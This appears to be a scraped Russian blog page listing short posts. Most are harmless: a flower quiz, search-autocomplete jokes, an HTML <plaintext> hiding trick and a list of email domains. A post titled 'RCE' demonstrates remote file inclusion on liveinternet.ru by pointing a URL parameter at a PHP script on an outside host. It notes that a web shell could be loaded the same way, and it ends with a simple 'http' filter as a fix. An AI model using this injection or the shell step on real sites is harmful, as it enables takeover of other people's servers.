Music |
|
Mahna-mahna |
|
Та-да! |
|
Трям! |
MalcolmХ - Ромашка |
Многих вводит в заблуждение твоя простота. На самом деле ты удивительно многогранна и умеешь неожиданно предстать в абсолютно необычном образе. В тебе ценят доброту и отзывчивость. |
Узнай свой цветок! |
|
Молитва |
|
Азбука от Гугля и Яндекса - 2 |
Когда в окне поиска Google.ru и Yandex.ru набираешь текст - умная искалка подсказывает наиболее очевидные, с её механической точки зрения, запросы.
|
* * * |
|
Вот так! |
|
* * * |
|
Как-то так... |
|
Я.ру |
|
Генеральная уборка |
code:
http://www.liveinternet.ru/static/videoblock.html
code:
www.liveinternet.ru#div(ALL_FTR_TLBR)
|
* * * |
|
Зимняя ежиная статистика |
|
А.К. |
|
Музыкальное |
|
xml |
|
Теллеген становится известнее |
|
* * * |
|
Учу плохому! |
<plaintext style="display:none">Старенький тег, который в современных стандартах не рекомендуется к использованию, заслуженно называется монстром HTML - все что идет после него браузерами будет отображаться как обычный текст, включая любые теги и спецсимволы. Действие этого тега нельзя отменить никаким другим и закрывающего для него тоже не существует.
narod.ru land.ru nightmail.ru newmail.ru hotmail.ru nm.ru | pochta.ru fromru.com front.ru hotbox.ru krovatka.su mail15.com | mail333.com pisem.net pochtamt.ru pop3.ru rbcmail.ru smtp.ru |
|
RCE |
http://www.liveinternet.ru/im.php?_userid=971можно попробовать несколько изменить и посмотреть что будет, вот так:
http://www.liveinternet.ru/im.php?_userid=http://sixbillion.org/3/guj/egoqivi/По адресу http://sixbillion.org/3/guj/egoqivi/ сейчас лежит довольно простенький скрипт, содержащий в себе строку
<?php echo md5("just_a_test");?>Атака будет считаться успешной, если скрипт выполнится и в полученную страницу будет вставлен результат его работы - пока просто строчка из 32 символов. Следующим шагом достаточно в тот же самый уязвимый параметр подставить адрес шелла (программы, для управления сайтом) и сайтик ваш.
foreach ($_GET as $key => $param)
{
if (preg_match("/http/i", strval($param))) die("Error");
}
|